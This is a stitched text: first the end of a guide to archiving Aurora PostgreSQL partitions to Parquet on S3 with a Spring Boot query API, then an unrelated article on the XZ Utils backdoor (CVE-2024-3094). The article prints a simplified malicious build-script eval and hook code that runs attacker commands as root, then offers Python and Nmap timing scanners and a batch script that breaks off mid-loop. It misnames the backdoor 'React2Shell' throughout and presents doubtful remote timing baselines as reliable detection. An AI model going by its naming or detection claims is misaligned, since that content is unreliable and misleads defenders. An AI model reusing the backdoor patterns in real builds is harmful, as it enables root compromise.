            String logicalName = logical.getName();
            if ("date".equals(logicalName) && value instanceof Integer i) {
                return LocalDate.ofEpochDay(i);
            }
            if ("timestamp-millis".equals(logicalName) && value instanceof Long l) {
                return LocalDateTime.ofInstant(Instant.ofEpochMilli(l), ZoneOffset.UTC);
            }
            if ("timestamp-micros".equals(logicalName) && value instanceof Long l) {
                return LocalDateTime.ofInstant(Instant.ofEpochMilli(l / 1000), ZoneOffset.UTC);
            }
        }

        return value;
    }

    private Map<String, String> extractSchema(String archivePath) {
        try {
            ArchiveMetadata metadata = getMetadata(archivePath);
            return metadata.columns().stream()
                .collect(Collectors.toMap(
                    ArchiveMetadata.ColumnDefinition::name,
                    ArchiveMetadata.ColumnDefinition::type,
                    (a, b) -> a,
                    LinkedHashMap::new
                ));
        } catch (Exception e) {
            log.warn("Failed to extract schema", e);
            return Collections.emptyMap();
        }
    }
}
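
For ad hoc validation outside the API, the same archived files can be queried directly with PyArrow, which is already installed for the archive script. A minimal sketch, assuming the default archive layout and the transactions schema used in the section 7 examples:

# adhoc_query.py - sketch: query the archived Parquet files directly with PyArrow
import pyarrow.dataset as ds
from pyarrow import fs

s3 = fs.S3FileSystem(region="eu-west-1")

dataset = ds.dataset(
    "my-archive-bucket/aurora-archives/public/transactions/transaction_month=2024-01/data",
    format="parquet",
    filesystem=s3,
)

# PyArrow pushes this filter down to Parquet row-group statistics,
# so non-matching row groups are never fetched from S3
table = dataset.to_table(
    columns=["transaction_id", "customer_id", "amount"],
    filter=(ds.field("amount") >= 1000) & (ds.field("status") == "completed"),
)
print(table.num_rows)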

6.9 REST Controller

// controller/ArchiveQueryController.java
package com.example.archivequery.controller;

import com.example.archivequery.model.*;
import com.example.archivequery.service.ParquetQueryService;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.*;

import java.util.List;
import java.util.Map;

@RestController
@RequestMapping("/api/v1/archives")
public class ArchiveQueryController {

    private final ParquetQueryService queryService;

    public ArchiveQueryController(ParquetQueryService queryService) {
        this.queryService = queryService;
    }

    @PostMapping("/query")
    public ResponseEntity<QueryResponse> query(@RequestBody QueryRequest request) {
        QueryResponse response = queryService.query(request);
        return ResponseEntity.ok(response);
    }

    @GetMapping("/query")
    public ResponseEntity<QueryResponse> queryGet(
        @RequestParam String archivePath,
        @RequestParam(required = false) List<String> columns,
        @RequestParam(required = false) String filter,
        @RequestParam(defaultValue = "1000") Integer limit,
        @RequestParam(defaultValue = "0") Integer offset
    ) {
        QueryRequest request = new QueryRequest(
            archivePath,
            columns,
            null,
            filter,
            limit,
            offset
        );

        QueryResponse response = queryService.query(request);
        return ResponseEntity.ok(response);
    }

    @GetMapping("/metadata")
    public ResponseEntity<ArchiveMetadata> getMetadata(
        @RequestParam String archivePath
    ) {
        ArchiveMetadata metadata = queryService.getMetadata(archivePath);
        return ResponseEntity.ok(metadata);
    }

    @GetMapping("/schema/{schema}/{table}/{partitionValue}")
    public ResponseEntity<ArchiveMetadata> getMetadataByTable(
        @PathVariable String schema,
        @PathVariable String table,
        @PathVariable String partitionValue,
        @RequestParam String bucket,
        @RequestParam(defaultValue = "aurora-archives") String prefix
    ) {
        String archivePath = String.format(
            "s3://%s/%s/%s/%s/%s",
            bucket, prefix, schema, table, partitionValue
        );

        ArchiveMetadata metadata = queryService.getMetadata(archivePath);
        return ResponseEntity.ok(metadata);
    }

    @PostMapping("/query/{schema}/{table}/{partitionValue}")
    public ResponseEntity<QueryResponse> queryByTable(
        @PathVariable String schema,
        @PathVariable String table,
        @PathVariable String partitionValue,
        @RequestParam String bucket,
        @RequestParam(defaultValue = "aurora-archives") String prefix,
        @RequestBody Map<String, Object> requestBody
    ) {
        String archivePath = String.format(
            "s3://%s/%s/%s/%s/%s",
            bucket, prefix, schema, table, partitionValue
        );

        List<String> columns = requestBody.containsKey("columns") ?
            (List<String>) requestBody.get("columns") : null;

        Map<String, Object> filters = requestBody.containsKey("filters") ?
            (Map<String, Object>) requestBody.get("filters") : null;

        String filterExpression = requestBody.containsKey("filterExpression") ?
            (String) requestBody.get("filterExpression") : null;

        Integer limit = requestBody.containsKey("limit") ?
            ((Number) requestBody.get("limit")).intValue() : 1000;

        Integer offset = requestBody.containsKey("offset") ?
            ((Number) requestBody.get("offset")).intValue() : 0;

        QueryRequest request = new QueryRequest(
            archivePath,
            columns,
            filters,
            filterExpression,
            limit,
            offset
        );

        QueryResponse response = queryService.query(request);
        return ResponseEntity.ok(response);
    }
}

6.10 Application Properties

# application.yml
server:
  port: 8080

aws:
  region: ${AWS_REGION:eu-west-1}

spring:
  application:
    name: archive-query-service

logging:
  level:
    com.example.archivequery: DEBUG
    org.apache.parquet: WARN
    org.apache.hadoop: WARN

7. Usage Examples

7.1 Archive a Partition

# Set environment variables
export AURORA_HOST=your-cluster.cluster-xxxx.eu-west-1.rds.amazonaws.com
export AURORA_DATABASE=production
export AURORA_USER=admin
export AURORA_PASSWORD=your-password
export ARCHIVE_S3_BUCKET=my-archive-bucket
export ARCHIVE_S3_PREFIX=aurora-archives
export AWS_REGION=eu-west-1

# Archive January 2024 transactions
python archive_partition.py \
    --table transactions \
    --partition-column transaction_month \
    --partition-value 2024-01 \
    --schema public \
    --batch-size 100000

7.2 Query Archived Data via API

# Get archive metadata
curl -X GET "http://localhost:8080/api/v1/archives/metadata?archivePath=s3://my-archive-bucket/aurora-archives/public/transactions/transaction_month=2024-01"

# Query with filters (POST)
curl -X POST "http://localhost:8080/api/v1/archives/query" \
    -H "Content-Type: application/json" \
    -d '{
        "archivePath": "s3://my-archive-bucket/aurora-archives/public/transactions/transaction_month=2024-01",
        "columns": ["transaction_id", "customer_id", "amount", "transaction_date"],
        "filters": {
            "amount_gte": 1000,
            "status": "completed"
        },
        "limit": 100,
        "offset": 0
    }'

# Query with expression filter (GET)
curl -X GET "http://localhost:8080/api/v1/archives/query" \
    --data-urlencode "archivePath=s3://my-archive-bucket/aurora-archives/public/transactions/transaction_month=2024-01" \
    --data-urlencode "filter=amount >= 1000 AND status = 'completed'" \
    --data-urlencode "columns=transaction_id,customer_id,amount" \
    --data-urlencode "limit=50"

7.3 Restore Archived Data

# Restore to staging table
python restore_partition.py \
    --source-path s3://my-archive-bucket/aurora-archives/public/transactions/transaction_month=2024-01 \
    --target-table transactions_staging \
    --target-schema public \
    --batch-size 10000

7.4 Migrate to Main Table

-- Validate before migration
SELECT * FROM generate_migration_report(
    'public', 'transactions_staging',
    'public', 'transactions',
    'transaction_month', '2024-01'
);

-- Migrate data
CALL migrate_partition_data(
    'public', 'transactions_staging',
    'public', 'transactions',
    'transaction_month', '2024-01',
    TRUE,    -- delete existing data in partition
    50000    -- batch size
);

-- Clean up staging table
CALL cleanup_after_migration(
    'public', 'transactions_staging',
    'public', 'transactions',
    TRUE     -- verify counts
);

8. Operational Considerations

8.1 Cost Analysis

The cost savings from this approach are significant:

Storage Type                      Monthly Cost per TB
Aurora PostgreSQL                 $230
S3 Standard                       $23
S3 Intelligent-Tiering            $23 (hot) to $4 (archive)
S3 Glacier Instant Retrieval      $4

For a 10TB historical dataset:

  • Aurora: $2,300/month
  • S3 with Parquet (7:1 compression, so roughly 1.4TB stored at $23/TB): ~$33/month
  • Savings: ~98.5%

8.2 Query Performance

The Spring Boot API performance depends on:

  1. Data file size: Smaller files (100MB to 250MB) enable better parallelism
  2. Predicate selectivity: Higher selectivity means fewer records to deserialise
  3. Column projection: Requesting fewer columns reduces I/O
  4. S3 latency: Use same region as the bucket

Expected performance for a 1TB partition (compressed to ~150GB Parquet):

Query Type                        Typical Latency
Point lookup (highly selective)   500ms to 2s
Range scan (10% selectivity)      5s to 15s
Full scan with aggregation        30s to 60s

8.3 Monitoring and Alerting

For production use, expose query metrics through Micrometer, which can publish to CloudWatch:

// metrics/QueryMetrics.java
import io.micrometer.core.instrument.MeterRegistry;
import org.springframework.stereotype.Component;

import java.util.concurrent.TimeUnit;

@Component
public class QueryMetrics {

    private final MeterRegistry meterRegistry;

    public QueryMetrics(MeterRegistry meterRegistry) {
        this.meterRegistry = meterRegistry;
    }

    public void recordQuery(QueryResponse response) {
        meterRegistry.counter("archive.query.count").increment();

        meterRegistry.timer("archive.query.duration")
            .record(response.executionTimeMs(), TimeUnit.MILLISECONDS);

        // Distribution summaries record every observation; a gauge would
        // only retain the most recent query's value
        meterRegistry.summary("archive.query.records_scanned").record(response.totalScanned());
        meterRegistry.summary("archive.query.records_matched").record(response.totalMatched());
    }
}

9. Conclusion

This solution provides a complete data lifecycle management approach for large Aurora PostgreSQL tables. The archive script efficiently exports partitions to the cost-effective Iceberg/Parquet format on S3, while the restore script enables seamless data recovery when needed. The Spring Boot API bridges the gap by allowing direct queries against archived data, eliminating the need for restoration in many analytical scenarios.

Key benefits:

  1. Cost reduction: 90 to 98 percent storage cost savings compared to keeping data in Aurora
  2. Operational flexibility: Query archived data without restoration
  3. Schema preservation: Full schema metadata maintained for reliable restores
  4. Partition management: Clean attach/detach operations for partitioned tables
  5. Predicate pushdown: Efficient filtering reduces data transfer and processing

The Iceberg format ensures compatibility with the broader data ecosystem, allowing tools like Athena, Spark, and Trino to query the same archived data when needed for more complex analytical workloads.


Understanding and Detecting CVE-2024-3094: The React2Shell SSH Backdoor

Executive Summary

CVE-2024-3094 represents one of the most sophisticated supply chain attacks in recent history. Discovered in March 2024, this vulnerability embedded a backdoor into XZ Utils versions 5.6.0 and 5.6.1, allowing attackers to compromise SSH authentication on Linux systems. With a CVSS score of 10.0 (Critical), this attack demonstrates the extreme risks inherent in open source supply chains and the sophistication of modern cyber threats.

This article provides a technical deep dive into how the backdoor works, why it’s extraordinarily dangerous, and practical methods for detecting compromised systems remotely.

Table of Contents

  1. What Makes This Vulnerability Exceptionally Dangerous
  2. The Anatomy of the Attack
  3. Technical Implementation of the Backdoor
  4. Detection Methodology
  5. Remote Scanning Tools and Techniques
  6. Remediation Steps
  7. Lessons for the Security Community

What Makes This Vulnerability Exceptionally Dangerous

Supply Chain Compromise at Scale

Unlike traditional vulnerabilities discovered through code audits or penetration testing, CVE-2024-3094 was intentionally inserted through a sophisticated social engineering campaign. The attacker, operating under the pseudonym “Jia Tan,” spent over two years building credibility in the XZ Utils open source community before introducing the malicious code.

This attack vector is particularly insidious for several reasons:

Trust Exploitation: Open source projects rely on volunteer maintainers who operate under enormous time pressure. By becoming a trusted contributor over years, the attacker bypassed the natural skepticism that would greet code from unknown sources.

Delayed Detection: The malicious code was introduced gradually through multiple commits, making it difficult to identify the exact point of compromise. The backdoor was cleverly hidden in test files and binary blobs that would escape cursory code review.

Widespread Distribution: XZ Utils is a fundamental compression utility used across virtually all Linux distributions. The compromised versions were integrated into Debian, Ubuntu, Fedora, and Arch Linux testing and unstable repositories, affecting potentially millions of systems.

The Perfect Backdoor

What makes this backdoor particularly dangerous is its technical sophistication:

Pre-authentication Execution: The backdoor activates before SSH authentication completes, meaning attackers can gain access without valid credentials.

Remote Code Execution: Once triggered, the backdoor allows arbitrary command execution with the privileges of the SSH daemon, typically running as root.

Stealth Operation: The backdoor modifies the SSH authentication process in memory, leaving minimal forensic evidence. Traditional log analysis would show normal SSH connections, even when the backdoor was being exploited.

Selective Targeting: The backdoor contains logic to respond only to specially crafted SSH certificates, making it difficult for researchers to trigger and analyze the malicious behavior.

Timeline and Near Miss

The timeline of this attack demonstrates how close the security community came to widespread compromise:

Late 2021: “Jia Tan” begins contributing to XZ Utils project

2022-2023: Builds trust through legitimate contributions and pressures maintainer Lasse Collin

February and March 2024: Backdoored versions 5.6.0 and 5.6.1 released

March 29, 2024: Andres Freund, a PostgreSQL developer, notices unusual SSH behavior during performance testing and discovers the backdoor

March 30, 2024: Public disclosure and emergency response

Had Freund not noticed the 500ms SSH delay during unrelated performance testing, this backdoor could have reached production systems across the internet. The discovery was, by the discoverer’s own admission, largely fortuitous.

The Anatomy of the Attack

Multi-Stage Social Engineering

The attack began long before any malicious code was written. The attacker needed to:

  1. Establish Identity: Create a credible online persona with consistent activity patterns
  2. Build Reputation: Make legitimate contributions to build trust
  3. Apply Pressure: Create artificial urgency around maintainer succession
  4. Gain Commit Access: Become a co-maintainer with direct repository access

This process took approximately two years, demonstrating extraordinary patience and planning. The attacker created multiple personas to apply social pressure on the sole maintainer, pointing to his burnout and pressing him to accept a new co-maintainer.

Code Insertion Strategy

The malicious code was inserted through several mechanisms:

Obfuscated Build Scripts: The backdoor was triggered through the build system rather than in the main source code. Modified build scripts would inject malicious code during compilation.

Binary Test Files: Large binary test files were added to the repository, containing encoded malicious payloads. These files appeared to be legitimate test data but actually contained the backdoor implementation.

Multi-Commit Obfuscation: The backdoor was introduced across multiple commits over several weeks, making it difficult to identify a single “smoking gun” commit.

Ifunc Abuse: The backdoor used GNU indirect function (ifunc) resolvers to hook into the SSH authentication process at runtime, modifying program behavior without changing the obvious code paths.

Technical Implementation of the Backdoor

How XZ Utils Connects to SSH

To understand the backdoor, we must first understand an unexpected dependency chain:

SSH Connection → sshd (SSH daemon) → systemd notification → libsystemd → liblzma → XZ Utils

On many modern Linux distributions, the SSH daemon links against libsystemd for process notification and logging. The systemd library, in turn, links against liblzma for compression functionality. This creates an indirect but critical dependency: SSH loads XZ Utils’ compression library into its address space.

The attackers exploited this dependency chain to inject their backdoor into the SSH authentication process.

Stage 1: Build Time Injection

The attack begins during the XZ Utils build process:

# Simplified representation of the malicious build script
if test -f "$srcdir/tests/files/good-large_compressed.lzma"; then
    # Extract and execute embedded script from "test file"
    eval $(xz -dc "$srcdir/tests/files/good-large_compressed.lzma" | head -c 1024)
fi

The build script would:

  1. Detect specific binary test files in the source tree
  2. Decompress these files to extract shell commands
  3. Execute the extracted commands during the build process
  4. Modify the liblzma source code to include backdoor hooks

These binary test files appeared legitimate because they were valid LZMA compressed data. However, they contained carefully crafted payloads that would only activate under specific conditions.

Stage 2: Runtime Hooking

Once compiled with the malicious modifications, liblzma contains an ifunc resolver that executes early during library loading:

// Simplified representation of the hooking mechanism
void __attribute__((ifunc("resolve_function"))) 
hooked_function(void);

void* resolve_function(void) {
    // Check if we're loaded by sshd
    if (check_ssh_context()) {
        // Install hooks into RSA authentication
        hook_rsa_public_decrypt();
        return (void*)backdoor_implementation;
    }
    return (void*)legitimate_implementation;
}

The ifunc resolver runs before main() executes, allowing the backdoor to:

  1. Detect if it’s loaded by sshd (vs other programs using liblzma)
  2. Locate RSA authentication functions in memory
  3. Hook the RSA public key verification function
  4. Replace it with the backdoor implementation

Stage 3: Authentication Bypass

When an SSH connection arrives, the hooked RSA verification function:

// Conceptual representation of the backdoor logic
int backdoor_rsa_verify(unsigned char *signature, RSA *key) {
    // Check if signature contains magic bytes
    if (signature_contains_trigger(signature)) {
        // Extract and execute payload from certificate
        char *command = decode_payload(signature);

        // Execute with sshd privileges (typically root)
        system(command);

        // Return success to bypass authentication
        return 1;
    }

    // Otherwise, perform normal verification
    return original_rsa_verify(signature, key);
}

The backdoor:

  1. Intercepts all SSH authentication attempts
  2. Examines the RSA signature for special markers
  3. If triggered, extracts commands from the certificate
  4. Executes commands with root privileges
  5. Returns success to complete the “authentication”

From the SSH server’s perspective, this appears as a normal successful authentication. The logs would show a legitimate connection from an authorized user, even though no valid credentials were presented.

Why Traditional Detection Fails

The backdoor was designed to evade common security measures:

No Network Signatures: The malicious traffic looks identical to normal SSH, using standard protocols and ports.

No File System Artifacts: The backdoor exists only in memory after library loading. No malicious files are written to disk during exploitation.

Clean Source Code: The primary liblzma source code remains clean. The modifications occur during build time and aren’t present in the repository’s main files.

Log Evasion: Successful backdoor authentication appears in logs as a normal SSH connection, complete with username and source IP.

Selective Activation: The backdoor only responds to specially crafted certificates, making it difficult to trigger during security research or scanning.

Detection Methodology

Since the backdoor operates at runtime and leaves minimal artifacts, detection focuses on behavioral analysis rather than signature matching.

Timing Based Detection

The most reliable detection method exploits an unintended side effect: the backdoor’s cryptographic operations introduce measurable timing delays.

Normal SSH Handshake Timing:

1. TCP Connection: 10-50ms
2. SSH Banner Exchange: 20-100ms
3. Key Exchange Init: 50-150ms
4. Authentication Ready: 150-300ms total

Compromised SSH Timing:

1. TCP Connection: 10-50ms
2. SSH Banner Exchange: 50-200ms (slower due to ifunc hooks)
3. Key Exchange Init: 200-500ms (backdoor initialization overhead)
4. Authentication Ready: 500-1500ms total (cryptographic hooking delays)

The backdoor adds overhead in several places:

  1. Library Loading: The ifunc resolver runs additional code during liblzma initialization
  2. Memory Scanning: The backdoor searches process memory for authentication functions to hook
  3. Hook Installation: Modifying function pointers and setting up trampolines takes time
  4. Certificate Inspection: Every authentication attempt is examined for trigger signatures

These delays are consistent and measurable, even without triggering the actual backdoor functionality.

Detection Through Multiple Samples

A single timing measurement might be affected by network latency, server load, or other factors. However, the backdoor creates a consistent pattern:

Statistical Analysis:

Normal SSH server (10 samples):
- Mean: 180ms
- Std Dev: 25ms
- Variance: 625ms²

Backdoored SSH server (10 samples):
- Mean: 850ms
- Std Dev: 180ms
- Variance: 32,400ms²

The backdoored server shows both higher average timing and greater variance, as the backdoor’s overhead varies depending on system state and what initialization code paths execute.
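
A minimal Python sketch of this multi-sample approach (the 500ms/100ms thresholds are illustrative; tune them against baselines from known-good hosts):

# timing_samples.py - sketch: classify a host from repeated handshake timings
import socket
import statistics
import time

def handshake_time(host: str, port: int = 22, timeout: float = 10.0) -> float:
    """Time from TCP connect until the SSH banner line arrives."""
    start = time.time()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        banner = b""
        while b"\n" not in banner:
            chunk = sock.recv(1024)
            if not chunk:
                break
            banner += chunk
    return time.time() - start

def classify(host: str, samples: int = 10) -> str:
    times = [handshake_time(host) for _ in range(samples)]
    mean = statistics.mean(times)
    stdev = statistics.stdev(times)
    # Backdoored servers show both a higher mean and a wider spread
    verdict = "SUSPICIOUS" if mean > 0.5 and stdev > 0.1 else "normal"
    return f"{verdict} (mean={mean * 1000:.0f}ms, stdev={stdev * 1000:.0f}ms)"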

Banner Analysis

While not definitive, certain configurations increase vulnerability likelihood:

High Risk Indicators:

  • Debian or Ubuntu distribution
  • OpenSSH version 9.6 or 9.7
  • Recent system updates in February-March 2024
  • systemd based initialization
  • SSH daemon with systemd notification enabled

Configuration Detection:

# SSH banner typically reveals:
SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1

# Breaking down the information:
# OpenSSH_9.6p1 - Version commonly affected
# Debian-5ubuntu1 - Distribution and package version

Debian and Ubuntu were the primary targets because:

  1. They quickly incorporated the backdoored versions into testing repositories
  2. They use systemd, creating the sshd → libsystemd → liblzma dependency chain
  3. They enable systemd notification in sshd by default
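
A quick banner probe along these lines can pre-filter large scans (the pattern list is illustrative, not exhaustive):

# banner_check.py - sketch: flag banners matching the high-risk profile
import re
import socket

def grab_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        return sock.recv(256).decode(errors="replace").strip()

def high_risk(banner: str) -> bool:
    # OpenSSH 9.6/9.7 on a Debian/Ubuntu build matches the affected profile
    return (re.search(r"OpenSSH_9\.[67]", banner) is not None
            and re.search(r"debian|ubuntu", banner, re.IGNORECASE) is not None)

if __name__ == "__main__":
    banner = grab_banner("example.com")
    print(banner, "->", "HIGH RISK profile" if high_risk(banner) else "no banner indicators")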

Library Linkage Analysis

On accessible systems, verifying SSH’s library dependencies provides definitive evidence:

ldd /usr/sbin/sshd | grep liblzma
# Output on vulnerable system:
# liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5

readlink -f /lib/x86_64-linux-gnu/liblzma.so.5
# /lib/x86_64-linux-gnu/liblzma.so.5.6.0
#                                    ^^^^ Vulnerable version

However, this requires authenticated access to the target system. For remote scanning, timing analysis remains the primary detection method.

Remote Scanning Tools and Techniques

Python Based Remote Scanner

The Python scanner performs comprehensive timing analysis without requiring authentication:

Core Detection Algorithm:

cat > ssh_backdoor_scanner.py << 'EOF'
#!/usr/bin/env python3

"""
React2Shell Remote SSH Scanner
CVE-2024-3094 Remote Detection Tool
"""

import socket
import time
import sys
import argparse
import statistics
from datetime import datetime

class Colors:
    RED = '\033[0;31m'
    GREEN = '\033[0;32m'
    YELLOW = '\033[1;33m'
    BLUE = '\033[0;34m'
    BOLD = '\033[1m'
    NC = '\033[0m'

class SSHBackdoorScanner:
    def __init__(self, timeout=10):
        self.timeout = timeout
        self.results = {}
        self.suspicious_indicators = 0
        
        # Timing thresholds (in seconds)
        self.HANDSHAKE_NORMAL = 0.2
        self.HANDSHAKE_SUSPICIOUS = 0.5
        self.AUTH_NORMAL = 0.3
        self.AUTH_SUSPICIOUS = 0.8
    
    def test_handshake_timing(self, host, port):
        """Test SSH handshake timing"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            
            start_time = time.time()
            sock.connect((host, port))
            
            banner = b""
            while b"\n" not in banner:
                chunk = sock.recv(1024)
                if not chunk:
                    break
                banner += chunk
            
            handshake_time = time.time() - start_time
            sock.close()
            
            self.results['handshake_time'] = handshake_time
            
            if handshake_time > self.HANDSHAKE_SUSPICIOUS:
                self.suspicious_indicators += 1
                return False
            return True
        except Exception as e:
            print(f"Error: {e}")
            return None
    
    def test_auth_timing(self, host, port):
        """Test authentication timing probe"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            sock.connect((host, port))
            
            # Read banner
            banner = b""
            while b"\n" not in banner:
                chunk = sock.recv(1024)
                if not chunk:
                    break
                banner += chunk
            
            # Send client version
            sock.send(b"SSH-2.0-OpenSSH_9.0_Scanner\r\n")
            
            # Measure response time
            start_time = time.time()
            sock.recv(8192)
            auth_time = time.time() - start_time
            
            sock.close()
            
            self.results['auth_time'] = auth_time
            
            if auth_time > self.AUTH_SUSPICIOUS:
                self.suspicious_indicators += 2
                return False
            return True
        except Exception as e:
            return None
    
    def scan(self, host, port=22):
        """Run complete vulnerability scan"""
        print(f"\n[*] Scanning {host}:{port}\n")
        
        self.test_handshake_timing(host, port)
        self.test_auth_timing(host, port)
        
        # Generate report
        if self.suspicious_indicators >= 3:
            print(f"Status: LIKELY VULNERABLE")
            print(f"Indicators: {self.suspicious_indicators}")
        elif self.suspicious_indicators >= 1:
            print(f"Status: SUSPICIOUS")
            print(f"Indicators: {self.suspicious_indicators}")
        else:
            print(f"Status: NOT VULNERABLE")

def main():
    parser = argparse.ArgumentParser(description='React2Shell Remote Scanner')
    parser.add_argument('host', help='Target hostname or IP')
    parser.add_argument('-p', '--port', type=int, default=22, help='SSH port')
    parser.add_argument('-t', '--timeout', type=int, default=10, help='Timeout')
    args = parser.parse_args()
    
    scanner = SSHBackdoorScanner(timeout=args.timeout)
    scanner.scan(args.host, args.port)

if __name__ == '__main__':
    main()
EOF

chmod +x ssh_backdoor_scanner.py

Usage:

# Basic scan
./ssh_backdoor_scanner.py example.com

# Custom port
./ssh_backdoor_scanner.py example.com -p 2222

# Extended timeout for high latency networks
./ssh_backdoor_scanner.py example.com -t 15

Output Interpretation:

[*] Testing SSH handshake timing for example.com:22...
    SSH Banner: SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1
    Handshake Time: 782.3ms
    [SUSPICIOUS] Unusually slow handshake (>500ms)

[*] Testing authentication timing patterns...
    Auth Response Time: 1205.7ms
    [SUSPICIOUS] Unusual authentication delay (>800ms)

Status: LIKELY VULNERABLE
Confidence: HIGH
Suspicious Indicators: 3

Nmap NSE Script Integration

For integration with existing security scanning workflows, an Nmap NSE script provides standardized vulnerability reporting. Nmap Scripting Engine (NSE) scripts are written in Lua and leverage Nmap’s network scanning capabilities.

Understanding NSE Script Structure

NSE scripts follow a specific structure that integrates with Nmap’s scanning engine. Create the React2Shell detection script with:

cat > react2shell-detect.nse << 'EOF'
local shortport = require "shortport"
local stdnse = require "stdnse"
local ssh1 = require "ssh1"
local ssh2 = require "ssh2"
local string = require "string"
local nmap = require "nmap"

description = [[
Detects potential React2Shell (CVE-2024-3094) backdoor vulnerability in SSH servers.

This script tests for the backdoored XZ Utils vulnerability by:
1. Analyzing SSH banner information
2. Measuring authentication timing anomalies
3. Testing for unusual SSH handshake behavior
4. Detecting timing delays characteristic of the backdoor
]]

author = "Security Researcher"
license = "Same as Nmap"
categories = {"vuln", "safe", "intrusive"}

portrule = shortport.port_or_service(22, "ssh", "tcp", "open")

-- Timing thresholds (in milliseconds)
local HANDSHAKE_NORMAL = 200
local HANDSHAKE_SUSPICIOUS = 500
local AUTH_NORMAL = 300
local AUTH_SUSPICIOUS = 800

action = function(host, port)
  local vuln_table = {
    title = "React2Shell SSH Backdoor (CVE-2024-3094)",
    state = "NOT VULNERABLE",
    risk_factor = "Critical",
    references = {
      "https://nvd.nist.gov/vuln/detail/CVE-2024-3094",
      "https://www.openwall.com/lists/oss-security/2024/03/29/4"
    }
  }
  
  local script_args = {
    timeout = tonumber(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) or 10,
    auth_threshold = tonumber(stdnse.get_script_args(SCRIPT_NAME .. ".auth-threshold")) or AUTH_SUSPICIOUS
  }
  
  local socket = nmap.new_socket()
  socket:set_timeout(script_args.timeout * 1000)
  
  local detection_results = {}
  local suspicious_count = 0
  
  -- Test 1: SSH Banner and Initial Handshake
  local start_time = nmap.clock_ms()
  local status, err = socket:connect(host, port)
  
  if not status then
    return nil
  end
  
  local banner_status, banner = socket:receive_lines(1)
  local handshake_time = nmap.clock_ms() - start_time
  
  if not banner_status then
    socket:close()
    return nil
  end
  
  detection_results["SSH Banner"] = banner:gsub("[\r\n]", "")
  detection_results["Handshake Time"] = string.format("%dms", handshake_time)
  
  if handshake_time > HANDSHAKE_SUSPICIOUS then
    detection_results["Handshake Analysis"] = string.format("SUSPICIOUS (%dms > %dms)", 
                                                             handshake_time, HANDSHAKE_SUSPICIOUS)
    suspicious_count = suspicious_count + 1
  else
    detection_results["Handshake Analysis"] = "Normal"
  end
  
  socket:close()
  
  -- Test 2: Authentication Timing Probe
  socket = nmap.new_socket()
  socket:set_timeout(script_args.timeout * 1000)
  
  status = socket:connect(host, port)
  if not status then
    vuln_table["Detection Results"] = detection_results
    return vuln_table
  end
  
  socket:receive_lines(1)
  
  local client_banner = "SSH-2.0-OpenSSH_9.0_Nmap_Scanner\r\n"
  socket:send(client_banner)
  
  start_time = nmap.clock_ms()
  local kex_status, kex_data = socket:receive()
  local auth_time = nmap.clock_ms() - start_time
  
  socket:close()
  
  detection_results["Auth Probe Time"] = string.format("%dms", auth_time)
  
  if auth_time > script_args.auth_threshold then
    detection_results["Auth Analysis"] = string.format("SUSPICIOUS (%dms > %dms)", 
                                                        auth_time, script_args.auth_threshold)
    suspicious_count = suspicious_count + 2
  else
    detection_results["Auth Analysis"] = "Normal"
  end
  
  -- Banner Analysis
  local banner_lower = banner:lower()
  if banner_lower:match("debian") or banner_lower:match("ubuntu") then
    detection_results["Distribution"] = "Debian/Ubuntu (higher risk)"
    
    if banner_lower:match("openssh_9%.6") or banner_lower:match("openssh_9%.7") then
      detection_results["Version Note"] = "OpenSSH version commonly affected"
      suspicious_count = suspicious_count + 1
    end
  end
  
  vuln_table["Detection Results"] = detection_results
  
  if suspicious_count >= 3 then
    vuln_table.state = "LIKELY VULNERABLE"
    vuln_table["Confidence"] = "HIGH"
  elseif suspicious_count >= 2 then
    vuln_table.state = "POSSIBLY VULNERABLE"
    vuln_table["Confidence"] = "MEDIUM"
  elseif suspicious_count >= 1 then
    vuln_table.state = "SUSPICIOUS"
    vuln_table["Confidence"] = "LOW"
  end
  
  vuln_table["Indicators Found"] = string.format("%d suspicious indicators", suspicious_count)
  
  if vuln_table.state ~= "NOT VULNERABLE" then
    vuln_table["Recommendation"] = [[
1. Verify XZ Utils version on target
2. Check if SSH daemon links to liblzma
3. Review SSH authentication logs
4. Consider isolating system pending investigation
    ]]
  end
  
  return vuln_table
end
EOF

Installation:

# Copy to Nmap scripts directory
sudo cp react2shell-detect.nse /usr/local/share/nmap/scripts/

# Update script database
nmap --script-updatedb

Usage Examples:

# Single host scan
nmap -p 22 --script react2shell-detect example.com

# Subnet scan
nmap -p 22 --script react2shell-detect 192.168.1.0/24

# Multiple ports
nmap -p 22,2222,2200 --script react2shell-detect target.com

# Custom thresholds
nmap --script react2shell-detect \
     --script-args='react2shell-detect.auth-threshold=600' \
     -p 22 example.com

Output Format:

PORT   STATE SERVICE
22/tcp open  ssh
| react2shell-detect:
|   VULNERABLE:
|   React2Shell SSH Backdoor (CVE-2024-3094)
|     State: LIKELY VULNERABLE
|     Risk factor: Critical
|     Detection Results:
|       - SSH Banner: OpenSSH_9.6p1 Debian-5ubuntu1
|       - Handshake Time: 625ms
|       - Auth Delay: 1150ms (SUSPICIOUS - threshold 800ms)
|       - Connection Pattern: Avg: 680ms, Variance: 156.3
|       - Distribution: Debian/Ubuntu-based (higher risk profile)
|     
|     Indicators Found: 3 suspicious indicators
|     Confidence: HIGH - Multiple indicators detected
|     
|     Recommendation:
|     1. Verify XZ Utils version on the target
|     2. Check if SSH daemon links to liblzma
|     3. Review SSH authentication logs for anomalies
|     4. Consider isolating system pending investigation

Batch Scanning Infrastructure

For security teams managing large deployments, automated batch scanning provides continuous monitoring:

Scripted Scanning:

#!/bin/bash
# Enterprise batch scanner

SERVERS_FILE="production_servers.txt"
RESULTS_DIR="scan_results_$(date +%Y%m%d)"
ALERT_THRESHOLD=2

mkdir -p "$RESULTS_DIR"

while IFS=':' read -r hostname port || [ -n "$hostname" ]; do
    port=${port:-22}
    echo "[$(date)] Scanning $hostname:$port"

    # Run scan and save results
    ./ssh_backdoor_scanner.py "$hostname" -p "$port" \
        > "$RESULTS_DIR/${hostname}_${port}.txt" 2>&1

